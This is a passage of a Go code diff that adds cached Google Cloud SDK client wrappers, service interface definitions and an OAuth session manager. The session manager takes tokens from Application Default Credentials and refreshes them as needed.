(*certificatemanager.Service, error) { + service, err := certificatemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Certificate Manager service: %w", err) + } + return service, nil +} + +// ============================================================================= +// CACHED CLIENT WRAPPERS - These cache clients for reuse +// ============================================================================= + +// CachedGetStorageClient returns a cached Storage client +func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + cacheKey := CacheKey("client", "storage") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storage.Client), nil + } + client, err := GetStorageClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetComputeService returns a cached Compute Engine service +func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + cacheKey := CacheKey("client", "compute") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*compute.Service), nil + } + service, err := GetComputeService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAMService returns a cached IAM service +func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + cacheKey := CacheKey("client", "iam") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iam.Service), nil + } + service, err := GetIAMService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetResourceManagerService returns a cached Resource Manager service +func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + cacheKey := CacheKey("client", "resourcemanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudresourcemanager.Service), nil + } + service, err := GetResourceManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerService returns a cached Secret Manager service +func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerapi.Service, error) { + cacheKey := CacheKey("client", "secretmanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanagerapi.Service), nil + } + service, err := GetSecretManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBigQueryService returns a cached BigQuery service +func CachedGetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigqueryapi.Service, error) { + cacheKey := CacheKey("client", "bigquery") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*bigqueryapi.Service), nil + } + service, err := GetBigQueryService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetStorageService returns a cached Storage service (REST API) +func CachedGetStorageService(ctx context.Context, session *gcpinternal.SafeSession) (*storageapi.Service, error) { + cacheKey := CacheKey("client", "storage-api") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storageapi.Service), nil + } + service, err := GetStorageService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetContainerService returns a cached GKE Container service +func CachedGetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + cacheKey := CacheKey("client", "container") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*container.Service), nil + } + service, err := GetContainerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudRunService returns a cached Cloud Run service +func CachedGetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + cacheKey := CacheKey("client", "cloudrun") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*run.APIService), nil + } + service, err := GetCloudRunService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudFunctionsService returns a cached Cloud Functions service (v1) +func CachedGetCloudFunctionsService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctions.Service, error) { + cacheKey := CacheKey("client", "cloudfunctions") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudfunctions.Service), nil + } + service, err := GetCloudFunctionsService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudFunctionsServiceV2 returns a cached Cloud Functions v2 service +func CachedGetCloudFunctionsServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctionsv2.Service, error) { + cacheKey := CacheKey("client", "cloudfunctionsv2") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudfunctionsv2.Service), nil + } + service, err := GetCloudFunctionsServiceV2(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDNSService returns a cached DNS service +func CachedGetDNSService(ctx context.Context, session *gcpinternal.SafeSession) (*dns.Service, error) { + cacheKey := CacheKey("client", "dns") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dns.Service), nil + } + service, err := GetDNSService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetLoggingService returns a cached Logging service +func CachedGetLoggingService(ctx context.Context, session *gcpinternal.SafeSession) (*logging.Service, error) { + cacheKey := CacheKey("client", "logging") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*logging.Service), nil + } + service, err := GetLoggingService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetKMSService returns a cached KMS service +func CachedGetKMSService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudkms.Service, error) { + cacheKey := CacheKey("client", "kms") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudkms.Service), nil + } + service, err := GetKMSService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSQLAdminService returns a cached SQL Admin service (v1) +func CachedGetSQLAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*sqladmin.Service, error) { + cacheKey := CacheKey("client", "sqladmin") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sqladmin.Service), nil + } + service, err := GetSQLAdminService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSQLAdminServiceBeta returns a cached SQL Admin service (v1beta4) +func CachedGetSQLAdminServiceBeta(ctx context.Context, session *gcpinternal.SafeSession) (*sqladminbeta.Service, error) { + cacheKey := CacheKey("client", "sqladminbeta") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sqladminbeta.Service), nil + } + service, err := GetSQLAdminServiceBeta(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetPubSubService returns a cached PubSub service +func CachedGetPubSubService(ctx context.Context, session *gcpinternal.SafeSession) (*pubsubapi.Service, error) { + cacheKey := CacheKey("client", "pubsub") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*pubsubapi.Service), nil + } + service, err := GetPubSubService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudIdentityService returns a cached Cloud Identity service +func CachedGetCloudIdentityService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudidentity.Service, error) { + cacheKey := CacheKey("client", "cloudidentity") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudidentity.Service), nil + } + service, err := GetCloudIdentityService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetAccessContextManagerService returns a cached Access Context Manager service +func CachedGetAccessContextManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*accesscontextmanager.Service, error) { + cacheKey := CacheKey("client", "accesscontextmanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*accesscontextmanager.Service), nil + } + service, err := GetAccessContextManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetRedisService returns a cached Redis service +func CachedGetRedisService(ctx context.Context, session *gcpinternal.SafeSession) (*redis.Service, error) { + cacheKey := CacheKey("client", "redis") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*redis.Service), nil + } + service, err := GetRedisService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSpannerService returns a cached Spanner service +func CachedGetSpannerService(ctx context.Context, session *gcpinternal.SafeSession) (*spanner.Service, error) { + cacheKey := CacheKey("client", "spanner") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*spanner.Service), nil + } + service, err := GetSpannerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBigtableAdminService returns a cached Bigtable Admin service +func CachedGetBigtableAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*bigtableadmin.Service, error) { + cacheKey := CacheKey("client", "bigtableadmin") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*bigtableadmin.Service), nil + } + service, err := GetBigtableAdminService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetFilestoreService returns a cached Filestore service +func CachedGetFilestoreService(ctx context.Context, session *gcpinternal.SafeSession) (*file.Service, error) { + cacheKey := CacheKey("client", "filestore") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*file.Service), nil + } + service, err := GetFilestoreService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudBuildService returns a cached Cloud Build service +func CachedGetCloudBuildService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudbuild.Service, error) { + cacheKey := CacheKey("client", "cloudbuild") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudbuild.Service), nil + } + service, err := GetCloudBuildService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetComposerService returns a cached Composer service +func CachedGetComposerService(ctx context.Context, session *gcpinternal.SafeSession) (*composer.Service, error) { + cacheKey := CacheKey("client", "composer") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*composer.Service), nil + } + service, err := GetComposerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDataflowService returns a cached Dataflow service +func CachedGetDataflowService(ctx context.Context, session *gcpinternal.SafeSession) (*dataflow.Service, error) { + cacheKey := CacheKey("client", "dataflow") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dataflow.Service), nil + } + service, err := GetDataflowService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDataprocService returns a cached Dataproc service +func CachedGetDataprocService(ctx context.Context, session *gcpinternal.SafeSession) (*dataproc.Service, error) { + cacheKey := CacheKey("client", "dataproc") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dataproc.Service), nil + } + service, err := GetDataprocService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetNotebooksService returns a cached Notebooks service +func CachedGetNotebooksService(ctx context.Context, session *gcpinternal.SafeSession) (*notebooks.Service, error) { + cacheKey := CacheKey("client", "notebooks") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*notebooks.Service), nil + } + service, err := GetNotebooksService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSchedulerService returns a cached Scheduler service +func CachedGetSchedulerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudscheduler.Service, error) { + cacheKey := CacheKey("client", "scheduler") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudscheduler.Service), nil + } + service, err := GetSchedulerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetAPIKeysService returns a cached API Keys service +func CachedGetAPIKeysService(ctx context.Context, session *gcpinternal.SafeSession) (*apikeys.Service, error) { + cacheKey := CacheKey("client", "apikeys") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*apikeys.Service), nil + } + service, err := GetAPIKeysService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetOrgPolicyService returns a cached Org Policy service +func CachedGetOrgPolicyService(ctx context.Context, session *gcpinternal.SafeSession) (*orgpolicy.Service, error) { + cacheKey := CacheKey("client", "orgpolicy") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*orgpolicy.Service), nil + } + service, err := GetOrgPolicyService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSourceRepoService returns a cached Source Repo service +func CachedGetSourceRepoService(ctx context.Context, session *gcpinternal.SafeSession) (*sourcerepo.Service, error) { + cacheKey := CacheKey("client", "sourcerepo") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sourcerepo.Service), nil + } + service, err := GetSourceRepoService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBeyondCorpService returns a cached BeyondCorp service +func CachedGetBeyondCorpService(ctx context.Context, session *gcpinternal.SafeSession) (*beyondcorp.Service, error) { + cacheKey := CacheKey("client", "beyondcorp") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*beyondcorp.Service), nil + } + service, err := GetBeyondCorpService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAPService returns a cached IAP service +func CachedGetIAPService(ctx context.Context, session *gcpinternal.SafeSession) (*iap.Service, error) { + cacheKey := CacheKey("client", "iap") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iap.Service), nil + } + service, err := GetIAPService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCertificateManagerService returns a cached Certificate Manager service +func CachedGetCertificateManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*certificatemanager.Service, error) { + cacheKey := CacheKey("client", "certificatemanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*certificatemanager.Service), nil + } + service, err := GetCertificateManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetServiceNetworkingService returns a cached Service Networking service +func CachedGetServiceNetworkingService(ctx context.Context, session *gcpinternal.SafeSession) (*servicenetworking.APIService, error) { + cacheKey := CacheKey("client", "servicenetworking") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*servicenetworking.APIService), nil + } + service, err := GetServiceNetworkingService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetArtifactRegistryService returns a cached Artifact Registry service +func CachedGetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistryapi.Service, error) { + cacheKey := CacheKey("client", "artifactregistry") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*artifactregistryapi.Service), nil + } + service, err := GetArtifactRegistryService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudRunServiceV2 returns a cached Cloud Run v2 service +func CachedGetCloudRunServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*runv2.Service, error) { + cacheKey := CacheKey("client", "cloudrunv2") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*runv2.Service), nil + } + service, err := GetCloudRunServiceV2(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerClient returns a cached Secret Manager client (Go SDK) +func CachedGetSecretManagerClient(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerclient.Client, error) { + cacheKey := CacheKey("client", "secretmanager-gosdk") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanagerclient.Client), nil + } + client, err := GetSecretManagerClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetAssetClient returns a cached Asset client +func CachedGetAssetClient(ctx context.Context, session *gcpinternal.SafeSession) (*asset.Client, error) { + cacheKey := CacheKey("client", "asset") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*asset.Client), nil + } + client, err := GetAssetClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetArtifactRegistryClient returns a cached Artifact Registry client (Go SDK) +func CachedGetArtifactRegistryClient(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Client, error) { + cacheKey := CacheKey("client", "artifactregistry-gosdk") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*artifactregistry.Client), nil + } + client, err := GetArtifactRegistryClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetOrganizationsClient returns a cached Organizations client +func CachedGetOrganizationsClient(ctx context.Context, session *gcpinternal.SafeSession) (*resourcemanager.OrganizationsClient, error) { + cacheKey := CacheKey("client", "organizations") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*resourcemanager.OrganizationsClient), nil + } + client, err := GetOrganizationsClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} diff --git a/internal/gcp/sdk/interfaces.go b/internal/gcp/sdk/interfaces.go new file mode 100644 index 00000000..024957fa --- /dev/null +++ b/internal/gcp/sdk/interfaces.go @@ -0,0 +1,138 @@ +package sdk + +import ( + "context" + + "cloud.google.com/go/iam" + "cloud.google.com/go/storage" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudresourcemanagerv2 "google.golang.org/api/cloudresourcemanager/v2" + compute "google.golang.org/api/compute/v1" + iam_admin "google.golang.org/api/iam/v1" + secretmanager "google.golang.org/api/secretmanager/v1" +) + +// StorageClientInterface defines the interface for Cloud Storage operations +type StorageClientInterface interface { + Buckets(ctx context.Context, projectID string) *storage.BucketIterator + Bucket(name string) *storage.BucketHandle + Close() error +} + +// StorageBucketInterface defines the interface for bucket operations +type StorageBucketInterface interface { + Attrs(ctx context.Context) (*storage.BucketAttrs, error) + IAM() *iam.Handle + Object(name string) *storage.ObjectHandle + Objects(ctx context.Context, q *storage.Query) *storage.ObjectIterator +} + +// ComputeServiceInterface defines the interface for Compute Engine operations +type ComputeServiceInterface interface { + // Instances + ListInstances(ctx context.Context, projectID, zone string) (*compute.InstanceList, error) + AggregatedListInstances(ctx context.Context, projectID string) (*compute.InstanceAggregatedList, error) + GetInstance(ctx context.Context, projectID, zone, instanceName string) (*compute.Instance, error) + + // Networks + ListNetworks(ctx context.Context, projectID string) (*compute.NetworkList, error) + GetNetwork(ctx context.Context, projectID, networkName string) (*compute.Network, error) + + // Firewalls + ListFirewalls(ctx context.Context, projectID string) (*compute.FirewallList, error) + + // Zones + ListZones(ctx context.Context, projectID string) (*compute.ZoneList, error) +} + +// IAMServiceInterface defines the interface for IAM operations +type IAMServiceInterface interface { + // Service Accounts + ListServiceAccounts(ctx context.Context, projectID string) ([]*iam_admin.ServiceAccount, error) + GetServiceAccount(ctx context.Context, name string) (*iam_admin.ServiceAccount, error) + ListServiceAccountKeys(ctx context.Context, name string) ([]*iam_admin.ServiceAccountKey, error) + + // Roles + ListRoles(ctx context.Context, projectID string) ([]*iam_admin.Role, error) + GetRole(ctx context.Context, name string) (*iam_admin.Role, error) +} + +// ResourceManagerServiceInterface defines the interface for Cloud Resource Manager operations +type ResourceManagerServiceInterface interface { + // Projects + ListProjects(ctx context.Context) ([]*cloudresourcemanager.Project, error) + GetProject(ctx context.Context, projectID string) (*cloudresourcemanager.Project, error) + GetProjectIAMPolicy(ctx context.Context, projectID string) (*cloudresourcemanager.Policy, error) + + // Organizations + ListOrganizations(ctx context.Context) ([]*cloudresourcemanager.Organization, error) + GetOrganization(ctx context.Context, name string) (*cloudresourcemanager.Organization, error) + GetOrganizationIAMPolicy(ctx context.Context, resource string) (*cloudresourcemanager.Policy, error) + + // Folders + ListFolders(ctx context.Context, parent string) ([]*cloudresourcemanagerv2.Folder, error) +} + +// SecretManagerServiceInterface defines the interface for Secret Manager operations +type SecretManagerServiceInterface interface { + // Secrets + ListSecrets(ctx context.Context, projectID string) ([]*secretmanager.Secret, error) + GetSecret(ctx context.Context, name string) (*secretmanager.Secret, error) + ListSecretVersions(ctx context.Context, secretName string) ([]*secretmanager.SecretVersion, error) + AccessSecretVersion(ctx context.Context, name string) (*secretmanager.AccessSecretVersionResponse, error) +} + +// BigQueryServiceInterface defines the interface for BigQuery operations +type BigQueryServiceInterface interface { + ListDatasets(ctx context.Context, projectID string) ([]string, error) + ListTables(ctx context.Context, projectID, datasetID string) ([]string, error) + GetDatasetIAMPolicy(ctx context.Context, projectID, datasetID string) (interface{}, error) + GetTableIAMPolicy(ctx context.Context, projectID, datasetID, tableID string) (interface{}, error) +} + +// ArtifactRegistryServiceInterface defines the interface for Artifact Registry operations +type ArtifactRegistryServiceInterface interface { + ListRepositories(ctx context.Context, projectID, location string) ([]interface{}, error) + GetRepository(ctx context.Context, name string) (interface{}, error) + ListDockerImages(ctx context.Context, parent string) ([]interface{}, error) +} + +// CloudFunctionsServiceInterface defines the interface for Cloud Functions operations +type CloudFunctionsServiceInterface interface { + ListFunctions(ctx context.Context, projectID, location string) ([]interface{}, error) + GetFunction(ctx context.Context, name string) (interface{}, error) + GetFunctionIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// CloudRunServiceInterface defines the interface for Cloud Run operations +type CloudRunServiceInterface interface { + ListServices(ctx context.Context, projectID, location string) ([]interface{}, error) + GetService(ctx context.Context, name string) (interface{}, error) + GetServiceIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// GKEServiceInterface defines the interface for GKE operations +type GKEServiceInterface interface { + ListClusters(ctx context.Context, projectID, location string) ([]interface{}, error) + GetCluster(ctx context.Context, name string) (interface{}, error) +} + +// PubSubServiceInterface defines the interface for Pub/Sub operations +type PubSubServiceInterface interface { + ListTopics(ctx context.Context, projectID string) ([]interface{}, error) + ListSubscriptions(ctx context.Context, projectID string) ([]interface{}, error) + GetTopicIAMPolicy(ctx context.Context, topic string) (interface{}, error) +} + +// KMSServiceInterface defines the interface for KMS operations +type KMSServiceInterface interface { + ListKeyRings(ctx context.Context, projectID, location string) ([]interface{}, error) + ListCryptoKeys(ctx context.Context, keyRing string) ([]interface{}, error) + GetCryptoKeyIAMPolicy(ctx context.Context, resource string) (interface{}, error) +} + +// LoggingServiceInterface defines the interface for Cloud Logging operations +type LoggingServiceInterface interface { + ListSinks(ctx context.Context, parent string) ([]interface{}, error) + ListMetrics(ctx context.Context, parent string) ([]interface{}, error) +} diff --git a/internal/gcp/session.go b/internal/gcp/session.go new file mode 100644 index 00000000..81640420 --- /dev/null +++ b/internal/gcp/session.go @@ -0,0 +1,442 @@ +package gcpinternal + +import ( + "context" + "encoding/json" + "fmt" + "os/exec" + "strings" + "sync" + "time" + + "golang.org/x/oauth2" + "golang.org/x/oauth2/google" + "google.golang.org/api/option" +) + +// CommonScopes defines the common OAuth scopes used by GCP services +var CommonScopes = []string{ + "https://www.googleapis.com/auth/cloud-platform", // Full GCP access + "https://www.googleapis.com/auth/cloud-platform.read-only", // Read-only GCP access + "https://www.googleapis.com/auth/compute", // Compute Engine access + "https://www.googleapis.com/auth/devstorage.full_control", // Cloud Storage full access +} + +// SafeSession provides thread-safe GCP authentication with token caching and auto-refresh +type SafeSession struct { + mu sync.Mutex + tokenSource oauth2.TokenSource + currentToken *oauth2.Token + tokens map[string]*oauth2.Token // scope -> token + sessionExpiry time.Time // When the current token expires + monitoring bool // Whether background monitoring is active + stopMonitor chan struct{} // Signal to stop monitoring + refreshBuffer time.Duration // How early to refresh before expiry (default 5 min) + + // Identity info + email string + projectID string + accountType string // "user" or "serviceAccount" +} + +// GCPCredentialInfo holds information about the current credential +type GCPCredentialInfo struct { + Email string `json:"email"` + AccountType string `json:"account_type"` // user, serviceAccount + ProjectID string `json:"project_id"` + Scopes []string +} + +// StaticTokenSource wraps a token for use with GCP clients +type StaticTokenSource struct { + StaticToken *oauth2.Token +} + +// Token returns the static token (implements oauth2.TokenSource) +func (s *StaticTokenSource) Token() (*oauth2.Token, error) { + return s.StaticToken, nil +} + +// NewSafeSession initializes a session using Application Default Credentials +// and prefetches tokens for common scopes +func NewSafeSession(ctx context.Context) (*SafeSession, error) { + // Check if gcloud is authenticated + if !IsSessionValid() { + return nil, fmt.Errorf("GCP session invalid; run 'gcloud auth application-default login' or 'gcloud auth login'") + } + + // Create token source from ADC + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return nil, fmt.Errorf("failed to create token source: %w", err) + } + + ss := &SafeSession{ + tokenSource: ts, + tokens: make(map[string]*oauth2.Token), + refreshBuffer: 5 * time.Minute, + stopMonitor: make(chan struct{}), + } + + // Get initial token and extract expiry + token, err := ts.Token() + if err != nil { + return nil, fmt.Errorf("failed to get initial token: %w", err) + } + ss.currentToken = token + ss.sessionExpiry = token.Expiry + + // Get identity info + info, err := ss.getCurrentIdentity(ctx) + if err == nil { + ss.email = info.Email + ss.accountType = info.AccountType + ss.projectID = info.ProjectID + } + + // Cache the token for the default scope + ss.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return ss, nil +} + +// NewSmartSession creates a session with automatic monitoring and refresh +func NewSmartSession(ctx context.Context) (*SafeSession, error) { + ss, err := NewSafeSession(ctx) + if err != nil { + return nil, err + } + + // Start background monitoring + ss.StartMonitoring(ctx) + + return ss, nil +} + +// ------------------------- TOKEN METHODS ------------------------- + +// GetToken returns a valid access token, refreshing if necessary +func (s *SafeSession) GetToken(ctx context.Context) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + return s.getTokenUnlocked(ctx) +} + +// getTokenUnlocked returns a token without locking (caller must hold lock) +func (s *SafeSession) getTokenUnlocked(ctx context.Context) (string, error) { + // Check if current token is still valid + if s.currentToken != nil && s.currentToken.Valid() { + return s.currentToken.AccessToken, nil + } + + // Refresh the token + token, err := s.tokenSource.Token() + if err != nil { + return "", fmt.Errorf("failed to refresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + return token.AccessToken, nil +} + +// GetTokenForScope returns a token for a specific OAuth scope +func (s *SafeSession) GetTokenForScope(ctx context.Context, scope string) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + + // Check cache first + if tok, ok := s.tokens[scope]; ok && tok.Valid() { + return tok.AccessToken, nil + } + + // Get a new token source for this scope + ts, err := google.DefaultTokenSource(ctx, scope) + if err != nil { + return "", fmt.Errorf("failed to create token source for scope %s: %w", scope, err) + } + + token, err := ts.Token() + if err != nil { + return "", fmt.Errorf("failed to get token for scope %s: %w", scope, err) + } + + // Cache the token + s.tokens[scope] = token + + return token.AccessToken, nil +} + +// GetTokenSource returns the underlying token source for use with GCP clients +func (s *SafeSession) GetTokenSource() oauth2.TokenSource { + return s.tokenSource +} + +// GetClientOption returns a client option for use with GCP API clients +func (s *SafeSession) GetClientOption() option.ClientOption { + return option.WithTokenSource(s.tokenSource) +} + +// GetTokenWithRetry attempts to get a token with automatic retry on failure +func (s *SafeSession) GetTokenWithRetry(ctx context.Context) (string, error) { + token, err := s.GetToken(ctx) + if err != nil { + // Try to refresh session and retry once + if refreshErr := s.RefreshSession(ctx); refreshErr == nil { + token, err = s.GetToken(ctx) + } + } + return token, err +} + +// ------------------------- SESSION MANAGEMENT ------------------------- + +// Ensure validates or refreshes the current session +func (s *SafeSession) Ensure(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + if s.currentToken != nil && s.currentToken.Valid() { + return nil + } + + // Try to get a new token + token, err := s.tokenSource.Token() + if err != nil { + return fmt.Errorf("GCP session invalid or expired: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + return nil +} + +// IsSessionExpired checks if the session has expired or will expire soon +func (s *SafeSession) IsSessionExpired() bool { + s.mu.Lock() + defer s.mu.Unlock() + + if s.sessionExpiry.IsZero() { + return false + } + + // Consider expired if within refresh buffer + return time.Now().Add(s.refreshBuffer).After(s.sessionExpiry) +} + +// RefreshSession refreshes the token and clears the cache +func (s *SafeSession) RefreshSession(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + // Check if gcloud session is still valid + if !IsSessionValid() { + return fmt.Errorf("GCP session expired; please run 'gcloud auth login' or 'gcloud auth application-default login'") + } + + // Create new token source + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return fmt.Errorf("failed to create token source: %w", err) + } + s.tokenSource = ts + + // Get fresh token + token, err := ts.Token() + if err != nil { + return fmt.Errorf("failed to get fresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + // Clear token cache + s.tokens = make(map[string]*oauth2.Token) + 